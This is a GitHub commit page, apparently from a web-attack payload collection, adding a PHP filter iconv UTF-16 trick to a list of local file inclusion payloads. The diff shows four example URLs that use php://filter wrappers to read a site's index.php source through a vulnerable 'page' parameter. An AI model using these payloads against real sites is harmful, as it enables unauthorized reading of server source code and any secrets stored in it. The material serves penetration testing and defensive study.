Merge pull request #105 from Zeecka/patch-3

Add filter iconv utf16 LFI bypass tricks
This commit is contained in:
Swissky 2019-10-17 19:39:00 +02:00 committed by GitHub
commit 67a68d7eac
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -122,6 +122,7 @@ The part "php://filter" is case insensitive
```powershell
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.iconv.utf-8.utf-16/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
```